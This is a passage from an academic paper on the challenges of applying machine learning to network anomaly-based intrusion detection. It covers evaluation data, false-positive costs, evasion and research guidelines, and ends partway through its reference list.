system to develop inferences about “peculiar” activity.
4With limitations of course. As it turns out, Japanese phone n umbers look
a lot like US social security numbers, as the Lawrence Berkel ey National
Laboratory noticed when monitoring for them in email [31].
widespread prevalence of strong correlations and “heavy-
tailed” data transfers [32], [33] regularly leads to large b ursts
of activity. It is crucial to acknowledge that in networking
such variability occurs regularly; it does not represent an y-
thing unusual. For an anomaly detection system, however,
such variability can prove hard to deal with, as it makes it
difficult to find a stable notion of “normality”.
One way to reduce the diversity of Internet traffic is
to employ aggregation . While highly variable over small-
to-medium time intervals, traffic properties tend to greate r
stability when observed over longer time periods (hours to
days, sometimes weeks). For example, in most networks
time-of-day and day-of-week effects exhibit reliable pat-
terns: if during today’s lunch break, the traffic volume is
twice as large as during the corresponding time slots last
week, that likely reflects something unusual occurring. Not
coincidentally, one form of anomaly detection system we
dofind in operation deployment is those that operate on
highly aggregated information, such as “volume per hour” or
“connections per source”. On the other hand, incidents foun d
by these systems tend to be rather noisy anyway—and often
straight-forward to find with other approaches (e.g., simpl e
threshold schemes). This last observation goes to the heart
of what can often undermine anomaly detection research
efforts: a failure to examine whether simpler, non-machine
learning approaches might work equally well.
Finally, we note that traffic diversity is not restricted
to packet-level features, but extends to application-laye r
information as well, both in terms of syntactic and semantic
variability. Syntactically, protocol specifications ofte n pur-
posefully leave room for interpretation, and in heterogene ous
traffic streams there is ample opportunity for corner-case
situations to manifest (see the discussion of “crud” in [34] ).
Semantically, features derived from application protocol s
can be just as fluctuating as network-layer packets (see, e.g .,
[35], [36]).
E. Difficulties with Evaluation
For an anomaly detection system, a thorough evaluation
is particularly crucial to perform, as experience shows tha t
many promising approaches turn out in practice to fall short
of one’s expectations. That said, devising sound evaluatio n
schemes is not easy, and in fact turns out to be more difficult
than building the detector itself . Due to the opacity of
the detection process, the results of an anomaly detection
system are harder to predict than for a misuse detector. We
discuss evaluation challenges in terms of the difficulties f or
(i)finding the right data, and then (ii)interpreting results.
1) Difficulties of Data: Arguably the most significant
challenge an evaluation faces is the lack of appropriate
public datasets for assessing anomaly detection systems. I n
other domains, we often find either standardized test suites
available, or the possibility to collect an appropriate cor pus,
or both. For example, for automatic language translation“a large training set of the input-output behavior that we
seek to automate is available to us in the wild ” [37]. For
spam detectors, dedicated “spam feeds” [38] provide large
collections of spam free of privacy concerns. Getting suita ble
collections of “ham” is more difficult, however even a small
number of private mail archives can already yield a large
corpus [39]. For OCR, sophisticated methods have been
devised to generate ground-truth automatically [40]. In ou r
domain, however, we often have neither standardized test
sets, nor any appropriate, readily available data.
The two publicly available datasets that have pro-
vided something of a standardized setting in the past—the
DARPA/Lincoln Labs packet traces [41], [42] and the KDD
Cup dataset derived from them [43]—are now a decade old,
and no longer adequate for any current study. The DARPA
dataset contains multiple weeks of network activity from a
simulated Air Force network, generated in 1998 and refined
in 1999. Not only is this data synthetic, and no longer even
close to reflecting contemporary attacks, but it also has bee n
so extensively studied over the years that most members of
the intrusion detection community deem it wholly uninter-
esting if a NIDS now reliably detects the attacks it contains .
(Indeed, the DARPA data faced pointed criticisms not long
after its release [44], particularly regarding the degree t o
which simulated data can be appropriate for the evaluation
of a NIDS.) The KDD dataset represents a distillation of
the DARPA traces into features for machine learning. Not
only does it inherit the shortcomings of the DARPA data,
but the features have also turned out to exhibit unfortunate
artifacts [45].
Given the lack of publicly available data, it is natural to
ask why we find such a striking gap in our community.5The
primary reason clearly arises from the data’s sensitive nat ure:
the inspection of network traffic can reveal highly sensitiv e
information, including confidential or personal communi-
cations, an organization’s business secrets, or its users’
network access patterns. Any breach of such information
can prove catastrophic not only for the organization itself ,
but also for affected third parties. It is understandable th at in
the face of such high risks, researchers frequently encount er
insurmountable organizational and legal barriers when the y
attempt to provide datasets to the community.
Given this difficulty, researchers have pursued two al-
ternative routes in the past: simulation and anonymization .
As demonstrated by the DARPA dataset, network traffic
generated by simulation can have the major benefit of
being free of sensitivity concerns. However, Internet traf fic
5We note that the lack of public network data is not limited to t he
intrusion detection domain. We see effects similar to the ov eruse of the
DARPA dataset in empirical network research: the ClarkNet-HTTP [46]
dataset contains two weeks’ worth of HTTP requests to ClarkN et’s web
server, recorded in 1995. While researchers at ClarkNet sto pped using these
logs for their own studies in 1997, in total researchers have used the traces
for evaluations in more than 90 papers published between 199 5 and 2007—
13 of these in 2007 [47]!
is already exceedingly difficult to simulate realistically by
itself [48]. Evaluating an anomaly detection system that
strives to find novel attacks using only simulated activity
will often lack any plausible degree of realism or relevance .
One can also sanitize captured data by, e.g., removing
or anonymizing potentially sensitive information [49], [5 0],
[51]. However, despite intensive efforts [52], [53], publi shing
such datasets has garnered little traction to date, mostly o ne
suspects for the fear that information can still leak. (As
[54] demonstrates, this fear is well justified.) Furthermor e,
even if a scrubbed dataset is available, its use with an
anomaly detection system can be quite problematic, since
by definition such systems look precisely for the kind of
artifacts that tend to be removed during the anonymization
process [55].
Due to the lack of public data, researchers are forced
to assemble their own datasets. However, in general this
isnotan easy task, as most lack access to appropriately
sized networks. It is crucial to realize that activity found in
a small laboratory network differs fundamentally from the
aggregate traffic seen upstream where NIDSs are commonly
deployed [26]. Conclusions drawn from analyzing a small
environment cannot be generalized to settings of larger sca le.
There is unfortunately no general answer to countering
the lack of data for evaluation purposes. For any study
it is thus crucial to (i)acknowledge shortcomings that
one’s evaluation dataset might impose, and (ii)consider
alternatives specific to the particular setting. We return t o
these points in Section IV-D1.
2) Mind the Gap: The semantic gap requires any study
to perform an explicit final step that tends to be implicit
in other domains: changing perspective to that of a user
of the system. In addition to correctly identifying attacks,
an anomaly detection system also needs to support the
operator in understanding the activity and enabling a quick
assessment of its impact. Suppose a system correctly finds a
previously unknown web server exploit, yet only reports it
as “HTTP traffic of host did not match the normal profile”.
The operator will spend significant additional effort figuri ng
out what happened, even if already having sufficient trust in
the system to take its alerts seriously. In other applicatio ns of
machine learning, we do not see a comparable problem, as
results tend to be intuitive there. Returning to spam detect ion
again, if the detector reports a mail as spam, there is not
much room for interpretation left.
We argue that when evaluating an anomaly detection
system, understanding the system’s semantic properties—
theoperationally relevant activity that it can detect, as well
as the blind spots every system will necessarily have—
is much more valuable than identifying a concrete set of
parameters for which the system happens to work best for
a particular input. The specifics of network environments
differ too widely to allow for predicting performance in
other settings based on just numbers. Yet, with insightinto the conceptual capabilities of a system, a network
operator can judge a detector’s potential to support differ ent
operational concerns as required. That said, we note that
Tan et al. demonstrated the amount of effort it can require
to understand a single parameter’s impact, even with an
conceptually simple anomaly detection system [56] .
3) Adversarial Setting: A final characteristic unique to
the intrusion detection domain concerns the adversarial en -
vironment such systems operate in. In contrast, users of OCR
systems won’t try to conceal characters in the input, nor wil l
Amazon customers have much incentive (or opportunity) to
mislead the company’s recommendation system. Network
intrusion detection, however, must grapple with a classic
arms-race: attackers and defenders each improve their tool s
in response to the other side devising new techniques. One
particular, serious concern in this regard is evasion : attackers
adjusting their activity to avoid detection. While evasion
poses a fundamentally hard problem for any NIDS [57],
anomaly detection faces further risks due to the nature
of underlying machine learning. In [58], Fogla and Lee
present an automated approach to mutate attacks so that they
match a system’s normal profile. More generally, in [59]
Barreno et al. present a taxonomy of attacks on machine-
learning systems.
From a research perspective, addressing evasion is a
stimulating topic to explore; on theoretical grounds it is
what separates intrusion detection most clearly from other
domains. However, we argue that from a practical perspec-
tive, the impact of the adversarial setting is not necessari ly
as significant as one might initially believe. Exploiting th e
specifics of a machine learning implementation requires
significant effort, time, and expertise on the attacker’s si de.
Considering that most of today’s attacks are however not
deliberately targeting handpicked victims—yet simply ex-
ploit whatever sites they find vulnerable, indiscriminantl y
seeking targets— the risk of an anomaly detector falling
victim to a sophisticated evasion attack is small in many
environments. Assuming such a threat model, it appears pru-
dent to focus first on addressing the many other challenges in
using machine learning effectively, as they affect a system ’s
operational performance more severely.
IV. R ECOMMENDATIONS FOR USING MACHINE
LEARNING
In light of the points developed above, we now formulate
guidelines that we hope will help to strengthen future
research on anomaly detection. We note that we view these
guidelines as touchstones rather than as firm rules; there
is certainly room for further discussion within the wider
intrusion detection community.
If we could give only one recommendation on how to
improve the state of anomaly detection research, it would be :
Understand what the system is doing . The intrusion detection
community does not benefit any further from yet another
study measuring the performance of some previously untried
combination of a machine learning scheme with a particular
feature set, applied to something like the DARPA dataset.
The nature of our domain is such that one can always find
a variation that works slightly better than anything else in
a particular setting. Unfortunately, while obvious for tho se
working in the domain for some time, this fact can be easily
lost on newcomers. Intuitively, when achieving better resu lts
on the same data than anybody else, one would expect this
to be a definite contribution to the progress of the field. The
point we wish to convey however is that we are working in
an area where insight matters much more than just numerical
results.
A. Understanding the Threat Model
Before starting to develop an anomaly detector, one needs
to consider the anticipated threat model, as that establish es
the framework for choosing trade-offs. Questions to addres s
include:
•What kind of environment does the system target?
Operation in a small network faces very different chal-
lenges than for a large enterprise or backbone network;
academic environments impose different requirements
than commercial enterprises.
•What do missed attacks cost? Possible answers ranges
from “very little” to “lethal.” A site’s determination will
depend on its security demands as well as on other
deployed attack detectors.
•What skills and resources will attackers have? If a site
deems itself at high risk for explicit targeting by an
attacker, it needs to anticipate much more sophisticated
attacks than those incurred by potential victims of
indiscriminant “background radiation” activity.
•What concern does evasion pose? The degree to which
attackers might analyze defense techniques and seek
to circumvent them determines the robustness require-
ments for any detector.
There are no perfect detectors in intrusion detection—
hence one always must settle for less-than-ideal solutions .
However, operators can make informed decisions only when
a system’s threat model is clearly stated.
B. Keeping The Scope Narrow
It is crucial to have a clear picture of what problem
a system targets: what specifically are the attacks to be
detected? The more narrowly one can define the target
activity, the better one can tailor a detector to its specific s
and reduce the potential for misclassifications.
Of course machine-learning is not a “silver bullet” guar-
anteed to appropriately match a particular detection task.
Thus, after identifying the activity to report, the next step is
a neutral assessment of what constitutes the right sort of to olfor the task; in some cases it will be an anomaly detector, but
in others a rule-based approach might hold more promise. A
common pitfall is starting with the premise to use machine-
learning (or, worse, a particular machine-learning approach)
and then looking for a problem to solve. We argue that such
a starting point is biased and thus rarely leads to the best
solution to a problem.
When settling on a specific machine-learning algorithm
as the appropriate tool, one should have an answer for
why the particular choice promises to perform well in the
intended setting—not only on strictly mathematical ground s,
but considering domain-specific properties. As discussed b y
Duda et al. [22], there are “no context-independent [. . . ]
reasons to favor one learning [. . . ] method over another”
(emphasis added); they call this the “no free lunch theorem” .
Note that if existing systems target similar activity, it ca n be
illuminating to understand their shortcomings to motivate
how the proposed approach avoids similar problems.
A substantive part of answering the Why? question is
identifying the feature set the detector will work with: ins ight
into the features’ significance (in terms of the domain) and
capabilities (in terms of revealing the targeted activity) goes
a long way towards reliable detection. A common pitfall
here is the temptation to base the feature set on a dataset
that happens to be at hand for evaluation. However, if one
cannot make a solid argument for the relation of the features
to the attacks of interest, the resulting study risks founde ring
on serious flaws.
A good example for the kind of mindset we deem vital for
sound anomaly detection studies is the work on web-based
attacks by Kruegel et al. [60]. From the outset, the authors
focus on a very specific class of attacks: exploiting web
servers with malformed query parameters. The discussion
convincingly argues for the need of anomaly detection
(such attacks share conceptual similarities, yet differ in their
specifics sufficiently to make writing signatures impractic al);
and the authors clearly motivate the choice of features by
comparing characteristics of benign and malicious request s
(e.g., the typical length of a query’s parameters tends to
be short, while a successful buffer overflow attempt likely
requires long shellcode sequences and padding). Laying out
the land like this sets up the stage for a well-grounded study .
C. Reducing the Costs
Per the discussion in Section III-B, it follows that one
obtains enormous benefit from reducing the costs associated
with using an anomaly detection system. Anecdotally, the
number one complaint about anomaly detection systems
is the excessive number of false positives they commonly
report. As we have seen, an anomaly detection system
does not necessarily make more mistakes than machine
learning systems deployed in other domains—yet the high
cost associated with each error often conflicts with effecti ve
operation. Thus, limiting false positives must be a top
priority for any anomaly detection system.
Likely the most important step towards fewer mistakes is
reducing the system’s scope, as discussed in Section IV-B.
Arguably, without a clear objective no anomaly detection
system can achieve a tolerable amount of false positives
without unacceptably compromising on its detection rate.
The setup of the underlying machine-learning problem also
has a direct impact on the number of false positives. Per
Section III-A, machine-learning works best when trained
using activity similar to that targeted for detection.
An anomaly detection system also requires a strategy
to deal with the natural diversity of network traffic (Sec-
tion III-D). Often, aggregating or averaging features over
suitable time intervals proves helpful, assuming the threa t
model allows for coarser granularity. Another approach is t o
carefully examine the features for their particular proper ties;
some will be more invariant than others. As a simple
flow-level example, the set of destination ports a particula r
internal host contacts will likely fluctuate quite a bit for
typical client systems; but we might often find the set of
ports on which it accepts incoming connections to be stable
over extended periods of time.
Finally, we can reduce false positives by post-processing
them with the support of additional information. For ex-
ample, Gu et al.’s “BotHunter” system uses a “statistical
payload anomaly detection engine” as one tool among others
(Snort signatures, and a typical scan detector), and a final
stage correlates the output of all of them [61]. Likewise,
Anagnostakis et al.’s “Shadow Honeypots” validate the
results of anomaly detectors with an instrumented copy
of the protected system [62]. If we find automated post-
processing infeasible, we might still be able to reduce
costs by providing the analyst with additional information
designed to accelerate the manual inspection process.
D. Evaluation
When evaluating an anomaly detection system, the pri-
mary objective should be to develop insight into the system’s
capabilities: What can it detect, and why? What can it
not detect, and why not? How reliably does it operate?
Where does it break? In our experience, the #1 reason
that conference submissions on anomaly detection fail aris es
from a failure to adequately explore these issues. We discus s
evaluation separately in terms of working with data, and
interpreting results.
1) Working with data: The single most important step
for sound evaluation concerns obtaining appropriate data t o
work with. The “gold standard” here is obtaining access
to a dataset containing real network traffic from as largean environment as possible6; and ideally multiple of these
from different networks. Work with actual traffic greatly
strengthens a study, as the evaluation can then demonstrate
how well the system should work in practice. In our experi-
ence, the best way to obtain such data is to provide a clear
benefit in return to the network’s operators; either, ideall y,
by research that aims to directly help to improve operations ,
or by exchanging the access for work on an unrelated area
of importance to the operators.
Note that the options for obtaining data differ with the
setting, and it often pays to consider potential data source s
early on when designing the detector. For example, hon-
eypots [63] can provide data (usually) free of sensitivity
concerns, though they cannot provide insight into how mali-
cious traffic manifests differently from benign “backgroun d”
traffic; or when working with companies that control large
quantities of the data of interest, one might need to plan
strategically by sending a student or staff member for an
extended stay. Alternatively, mediated trace access can be
a viable strategy [64]: rather than bringing the data to
the experimenter, bring the experiment to the data, i.e.,
researchers send their analysis programs to data providers
who then run them on their behalf and return the output.
Once acquired, the datasets require a careful assessment
of their characteristics. To interpret results correctly, one
must not only understand what the data contains, but also
how it is flawed . No dataset is perfect: often measurements
include artifacts that can impact the results (such as filter ing
or unintended loss), or unrelated noise that one can safely
filter out ifreadily identified (e.g., an internal vulnerability
scan run by the security department). See [65] for further
discussion of issues relating to working with network data.
When evaluating an anomaly detection system, one al-
ways needs multiple datasets. First, one must train the
system with different data than used for ultimate evaluatio n.
(This is a basic requirement for sound science, yet over-
looked surprisingly often; see however [21] for a set of stan -
dard techniques one can apply when having only limited data
available). Perhaps less obviously, to demonstrate that th e
system can adapt to different environments through learnin g
requires evaluation using data from multiple sources. We
stress that, as noted in Section III-E1, the DARPA and KDD
Cup traces cannot serve as viable datasets. Their only role
in contemporary research is for basic functionality tests a nd
cross-checking results (i.e., to test whether an approach i s
hopelessly broken).
Subdividing is a standard approach for performing training
and detection on different traffic even when one has only a
single dataset from the examined environment. It works by
selecting subsets of the available data via random sampling .
6Results from large environments usually transfer directly to smaller net-
works, with the benefit that one can choose trade-offs more co nservatively
in the latter. However, results collected in small environm ents rarely apply
directly to large ones.
Subdividing can work well if it is performed in advance of
the actual study. Note however that the splitting must be
unbiased with regards to the features the anomaly detection
system examines. For example, when operating on a per-
flow basis, one should flow-sample the dataset rather than
packet-sample.
2) Understanding results: The most important aspect of
interpreting results is to understand their origins . A sound
evaluation frequently requires relating input and output o n
a very low-level. Researchers need to manually examine
false positives. If when doing so one cannot determine
why the system incorrectly reported a particular instance,
this indicates a lack of insight into the anomaly detection
system’s operation. Note, one needs to relate such false
positives to the semantics of the traffic; it is hardly helpful to
frame them in the mathematical terms of the detection logic
(“activity exceeded the distance metric’s threshold”). If faced
with too many false positives to manually examine, then one
can employ random sampling to select an appropriately sized
subset for direct inspection.
False negatives often prove harder to investigate than
false positives because they require reliable ground-truth ,
which can be notoriously hard to obtain for an anomaly
detection system that aims to spot previously unseen activi ty.
Nevertheless, such an assessment forms a crucial part of
the story and merits careful attention. It can be highly
beneficial to consider the question of ground-truth already
at the beginning of a study. If one cannot find a sound way
to obtain ground-truth for the evaluation, then it becomes
questionable to pursue the work at all , even if it otherwise
appears on a solid foundation. One must collect ground-trut h
via a mechanism orthogonal (unrelated) to how the detector
works. One approach is to use a different mechanism to label
the input, with the obvious disadvantage that such input wil l
only be as good as this other technique. (Sometimes a subset
of the data can arguably be labeled in this fashion with high
accuracy. If so, then provided that the subset is formed in a
fashion independent from how the detector under develop-
ment functions, one can extrapolate from performance on the
subset to broader performance.) Another solution is manual
labeling—often however infeasible given the large amount
of data a NIDS operates on. A final compromise is to inject a
set of attacks deemed representative of the kind the anomaly
detection system should detect.
An important but often overlooked additional consider-
ation is to include in an evaluation inspection of the true
positives and negatives as well. This need arises from the
opacity of the decision process: with machine learning, it
is often not apparent what the system learned even when
it produces correct results. A classic illustration of this
problem comes from a Pentagon project from 1980s [66]:
a neural network was trained to detect tanks in photos,
and in the initial evaluation it was indeed able to correctly
separate photos depicting tanks from those which did not. Itturned out, however, that the datasets used for training and
evaluation shared a subtle property: photos of tanks were
taken on a cloudy day, while all others had a blue sky. As
later cross-checking revealed, the neural network had simp ly
learned to detect the color of the sky.
We can in fact turn around the notion of understanding the
origins of anomaly detection results, changing the emphasi s
from gaining insight into how an anomaly detection system
achieves its results to instead illuminating the problem
space . That is, machine learning is often underappreciated
as potentially providing a means to an end, rather than an
end itself: one employs it not to ultimately detect maliciou s
activity, but rather to understand the significance of the
different features of benign and malicious activity, which
then eventually serve as the basis for a non-machine-learning
detector.
For example, consider spam classification. By examining
which phrases a Bayesian classifier employs most effectivel y
one might discover that certain parts of messages (e.g.,
subject lines, Received headers, MIME tags) provide
disproportionate detection power. In this contrived examp le,
one might then realize that a detector that directly exam-
ines those components—perhaps not employing any sort of
Bayesian-based analysis, but instead building on separate
domain knowledge—can provide more effective classifica-
tion by leveraging the structural properties of the domain.
Thus, machine learning can sometimes serve very effectivel y
to “point the way” to how to develop detectors that are
themselves based on different principles. (The idea here is
similar to that employed in Principle Component Analysis,
which aims to find which among a wide set of features
contribute the most to particular clusters of activity [22] .)
We note that such an approach can also help overcome
potential performance bottlenecks. Many machine learning
algorithms are best suited for offline batch operation, and
less so for settings requiring low-latency real-time detec tion.
Non-machine-learning detectors often prove significantly
easier to implement in a streaming fashion even at high data
rates.
A separate consideration concerns how an evaluation
compares results with other systems found in the literature .
Doing so requires care to ensure fair treatment. The suc-
cessful operation of an anomaly detection system typically
requires significant experience with the particular system ,
as it needs to be tuned to the local setting—experience that
can prove cumbersome to collect if the underlying objective
is instead to understand the new system. Nevertheless, as a
first step a comparative study needs to reproduce the results
reported in the literature for the “foreign” system.
Finally, the most convincing real-world test of any
anomaly detection system is to solicit feedback from opera-
tors who run the system in their network. If they genuinely
deem the system helpful in their daily routine, that provide s
compelling support for the study.
V. C ONCLUSION
Our work examines the surprising imbalance between the
extensive amount of research on machine learning-based
anomaly detection pursued in the academic intrusion detec-
tion community, versus the lack of operational deployments
of such systems. We argue that this discrepancy stems in
large part from specifics of the problem domain that make
it significantly harder to apply machine learning effective ly
than in many other areas of computer science where such
schemes are used with greater success. The domain-specific
challenges include: (i)the need for outlier detection , while
machine learning instead performs better at finding similari-
ties;(ii)very high costs of classification errors, which render
error rates as encountered in other domains unrealistic;
(iii) a semantic gap between detection results and their
operational interpretation; (iv)the enormous variability of
benign traffic, making it difficult to find stable notions of
normality; (v)significant challenges with performing sound
evaluation; and (vi)the need to operate in an adversarial
setting. While none of these render machine learning an
inappropriate tool for intrusion detection, we deem their
unfortunate combination in this domain as a primary reason
for its lack of success.
To overcome these challenges, we provide a set of guide-
lines for applying machine learning to network intrusion
detection. In particular, we argue for the importance of
obtaining insight into the operation of an anomaly detection
system in terms of its capabilities and limitations from
an operational point of view . It is crucial to acknowledge
that the nature of the domain is such that one can always
find schemes that yield marginally better ROC curves than
anything else has for a specific given setting. Such results
however do not contribute to the progress of the field without
anysemantic understanding of the gain.
We hope for this discussion to contribute to strengthening
future research on anomaly detection by pinpointing the
fundamental challenges it faces. We stress that we do not
consider our discussion as final, and we look forward to
the intrusion detection community engaging in an ongoing
dialog on this topic.
ACKNOWLEDGMENTS
We would like to thank Gerald Friedland for discussions
and feedback, as well as the anonymous reviewers for their
valuable suggestions. This work was supported in part by
NSF Awards NSF-0433702 and CNS-0905631. Opinions,
findings, and conclusions or recommendations are those of
the authors and do not necessarily reflect the views of the
National Science Foundation. This work was also supported
by the Director, Office of Science, Office of Advanced
Scientific Computing Research, of the U.S. Department of
Energy under Contract No. DE-AC02-05CH11231.REFERENCES
[1] C. Ko, M. Ruschitzka, and K. Levitt, “Execution Monitor-
ing of Security-Critical Programs in Distributed Systems: A
Specification-based Approach,” in Proc. IEEE Symposium on
Security and Privacy , 1997.
[2] D. R. Ellis, J. G. Aiken, K. S. Attwood, and S. D. Tenaglia,
“A Behavioral Approach to Worm Detection,” in Proc. ACM
CCS WORM Workshop , 2004.
[3] G. Linden, B. Smith, and J. York, “Amazon.com Recommen-
dations: Item-to-Item Collaborative Filtering,” IEEE Internet
Computing , vol. 7, no. 1, pp. 76–80, 2003.
[4] J. Bennett, S. Lanning, and N. Netflix, “The Netflix Prize, ”
inProc. KDD Cup and Workshop , 2007.
[5] L. Vincent, “Google Book Search: Document Understandin g
on a Massive Scale,” 2007.
[6] R. Smith, “An Overview of the Tesseract OCR Engine,” in
Proc. International Conference on Document Analysis and
Recognition , 2007.
[7] F. J. Och and H. Ney, “The Alignment Template Approach to
Statistical Machine Translation,” Comput. Linguist. , vol. 30,
no. 4, pp. 417–449, 2004.
[8] P. Graham, “A Plan for Spam,” in Hackers & Painters .
O’Reilly, 2004.
[9] D. E. Denning, “An Intrusion-Detection Model,” IEEE Trans-
actions on Software Engineering , vol. 13, no. 2, pp. 222–232,
1987.
[10] H. S. Javitz and A. Valdes, “The NIDES Statistical Compo -
nent: Description and Justification,” SRI International, T ech.
Rep., 1993.
[11] W. Lee and D. Xiang, “Information-Theoretic Measures f or
Anomaly Detection,” in Proc. IEEE Symposium on Security
and Privacy , 2001.
[12] Z. Zhang, J. Li, C. Manikopoulos, J. Jorgenson, and J. Uc les,
“HIDE: a Hierarchical Network Intrusion Detection System
Using Statistical Preprocessing and Neural Network Classi fi-
cation,” in Proc. IEEE Workshop on Information Assurance
and Security , 2001.
[13] W. Hu, Y . Liao, and V . R. Vemuri, “Robust Anomaly Detec-
tion Using Support Vector Machines,” in Proc. International
Conference on Machine Learning , 2003.
[14] C. Sinclair, L. Pierce, and S. Matzner, “An Application of
Machine Learning to Network Intrusion Detection,” in Proc.
Computer Security Applications Conference , 1999.
[15] S. A. Hofmeyr, “An Immunological Model of Distributed
Detection and its Application to Computer Security,” Ph.D.
dissertation, University of New Mexico, 1999.
[16] V . Chandola, A. Banerjee, and V . Kumar, “Anomaly Detec-
tion: A Survey,” University of Minnesota, Tech. Rep., 2007.
[17] R. J. Bolton and D. J. Hand, “Statistical Fraud Detectio n: A
Review,” Statistical Science , vol. 17, no. 3, 2002.
[18] C. Gates and C. Taylor, “Challenging the Anomaly Detect ion
Paradigm: A Provocative Discussion,” in Proc. Workshop on
New Security Paradigms , 2007.
[19] “Peakflow SP,” http://www.arbornetworks.com/en/
peakflow-sp.html.
[20] “StealthWatch,” http://www.lancope.com/products/ .
[21] I. H. Witten and E. Frank, Data Mining: Practical Machine
Learning Tools and Techniques (2nd edition) . Morgan
Kaufmann, 2005.
[22] R. O. Duda, P. E. Hart, and D. G. Stork, Pattern Classification
(2nd edition) . Wiley Interscience, 2001.
[23] S. Axelsson, “The Base-Rate Fallacy and Its Implicatio ns for
the Difficulty of Intrusion Detection,” in Proc. ACM Confer-
ence on Computer and Communications Security , 1999.
[24] “Make Data Useful,” Greg Linden, Data Mining Seminar,
Stanford University, 2006. http://glinden.blogspot.com /2006/
12/slides-from-my-talk-at-stanford.htm%l.
[25] C. Allauzen, M. Riley, J. Schalkwyk, W. Skut, and M. Mohr i,
“OpenFst: A General and Efficient Weighted Finite-state
Transducer Library,” in Proc. International Conference on
Implementation and Application of Automata , 2007.
[26] R. Sommer, “Viable Network Intrusion Detection in
High-Performance Environments,” Ph.D. dissertation,
TU M ̈ unchen, 2005.
[27] C. V . Wright, L. Ballard, F. Monrose, and G. M. Masson,
“Language Identification of Encrypted V oIP traffic: Alejand ra
y Roberto or Alice and Bob?” in Proc. USENIX Security
Symposium , 2007.
[28] T.-F. Yen, X. Huang, F. Monrose, and M. K. Reiter, “Brows er
Fingerprinting from Coarse Traffic Summaries: Techniques
and Implications,” in Proc. Conference on Detection of In-
trusions and Malware & Vulnerability Assessment , 2009.
[29] A. Narayanan and V . Shmatikov, “Robust De-anonymizati on
of Large Sparse Datasets,” in IEEE Symposium on Security
and Privacy , 2008.
[30] A. Kumar, V . Paxson, and N. Weaver, “Exploiting Underly ing
Structure for Detailed Reconstruction of an Internet-scal e
Event,” in ACM SIGCOMM Internet Measurement Confer-
ence, 2005.
[31] Jim Mellander, Lawrence Berkeley National Laboratory , via
personal communication, 2009.
[32] W. Willinger, M. S. Taqqu, R. Sherman, and D. V . Wilson,
“Self-Similarity Through High-Variability: Statistical Analy-
sis of Ethernet LAN Traffic at the Source Level,” IEEE/ACM
Transactions on Networking , vol. 5, no. 1, 1997.
[33] A. Feldmann, A. C. Gilbert, and W. Willinger, “Data Net-
works As Cascades: Investigating the Multifractal Nature o f
Internet WAN Traffic,” in Proc. ACM SIGCOMM , 1998.[34] V . Paxson, “Bro: A System for Detecting Network Intrude rs
in Real-Time,” Computer Networks , vol. 31, no. 23–24, pp.
2435–2463, 1999.
[35] P. Gill, M. Arlitt, Z. Li, and A. Mahanti, “YouTube Traffi c
Characterization: A View From the Edge,” in Proc. ACM
SIGCOMM Internet Measurement Conference , 2008.
[36] A. Nazir, S. Raza, and C.-N. Chuah, “Unveiling Facebook : A
Measurement Study of Social Network Based Applications,”
inProc. SIGCOMM Internet Measurement Conference , 2008.
[37] A. Haley, P. Norvig, and F. Pereira, “The Unreasonable
Effectiveness of Data,” IEEE Intelligent Systems , March/April
2009.
[38] D. S. Anderson, C. Fleizach, S. Savage, and G. M. V oelker ,
“Spamscatter: Characterizing Internet Scam Hosting Infra s-
tructure,” in Proc. USENIX Security Symposium , 2007.
[39] G. V . Cormack and T. R. Lynam, “Online Supervised Spam
Filter Evaluation,” ACM Transactions on Information Sys-
tems, vol. 25, no. 3, 2007.
[40] J. van Beusekom, F. Shafait, and T. M. Breuel, “Automate d
OCR Ground Truth Generation,” in Proc. DAS 2008 , Sep
2008.
[41] R. Lippmann, R. K. Cunningham, D. J. Fried, I. Graf, K. R.
Kendall, S. E. Webster, and M. A. Zissman, “Results of
the 1998 DARPA Offline Intrusion Detection Evaluation,” in
Proc. Recent Advances in Intrusion Detection , 1999.
[42] R. Lippmann, J. W. Haines, D. J. Fried, J. Korba, and K. Da s,
“The 1999 DARPA Off-line Intrusion Detection Evaluation,”
Computer Networks , vol. 34, no. 4, pp. 579–595, October
2000.
[43] “KDD Cup Data,” http://kdd.ics.uci.edu/databases/k ddcup99/
kddcup99.html.
[44] J. McHugh, “Testing Intrusion detection systems: A cri tique
of the 1998 and 1999 DARPA intrusion detection system
evaluations as performed by Lincoln Laboratories,” ACM
Transactions on Information and System Security , vol. 3,
no. 4, pp. 262–294, November 2000.
[45] M. V . Mahoney and P. K. Chan, “An Analysis of the 1999
DARPA/Lincoln Laboratory Evaluation Data for Network
Anomaly Detection,” in Proc. Recent Advances in Intrusion
Detection , 2003.
[46] “ClarkNet-HTTP,” http://ita.ee.lbl.gov/html/cont rib/
ClarkNet-HTTP.html.
[47] Martin Arlitt, via personal communication, 2008.
[48] S. Floyd and V . Paxson, “Difficulties in Simulating the
Internet,” IEEE/ACM Transactions on Networking , vol. 9,
no. 4, 2001.
[49] “tcpdpriv,” http://ita.ee.lbl.gov/html/contrib/t cpdpriv.html.
[50] J. Xu, J. Fan, M. Ammar, and S. Moon, “On the De-
sign and Performance of Prefix-Preserving IP Traffic Trace
Anonymization,” in Proc. ACM SIGCOMM Internet Measure-
ment Workshop , Nov. 2001.
[51] R. Pang, M. Allman, V . Paxson, and J. Lee, “The Devil and
Packet Trace Anonymization,” in Computer Communication
Review , 2006.
[52] “The Internet Traffic Archive (ITA),” http://ita.ee.l bl.gov.
[53] “PREDICT,” http://www.predict.org.
[54] S. E. Coull, C. V . Wright, F. Monrose, M. P. Collins, and
M. K. Reiter, “Playing Devil’s Advocate: Inferring Sensiti ve
Information from Anonymized Network Traces,” in Proc.
Network and Distributed Security Symposium , 2007.
[55] K. S. Killourhy and R. A. Maxion, “Toward Realistic and
Artifact-Free Insider-Threat Data,” Proc. Computer Security
Applications Conference , 2007.
[56] K. M. Tan and R. A. Maxion, “”Why 6?” Defining the
Operational Limits of Stide, an Anomaly-Based Intrusion
Detector,” in Proc. IEEE Symposium on Security and Privacy ,
2002.
[57] T. H. Ptacek and T. N. Newsham, “Insertion, Evasion, and
Denial of Service: Eluding Network Intrusion Detection,”
Secure Networks, Inc., Tech. Rep., January 1998.
[58] P. Fogla and W. Lee, “Evading Network Anomaly Detection
Systems: Formal Reasoning and Practical Techniques,” in
Proc. ACM Conference on Computer and Communications
Security , 2006.
[59] M. Barreno, B. Nelson, R. Sears, A. D. Joseph, and J. D.
Tygar, “Can Machine Learning Be Secure?” in Proc. ACM
Symposium on Information, Computer and Communications
Security , 2006.
[60] C. Kruegel and G. Vigna, “Anomaly Detection of Web-
based Attacks,” in Proc. ACM Conference on Computer and
Communications Security , 2003.
[61] G. Gu, P. Porras, V . Yegneswaran, M. Fong, and W. Lee,
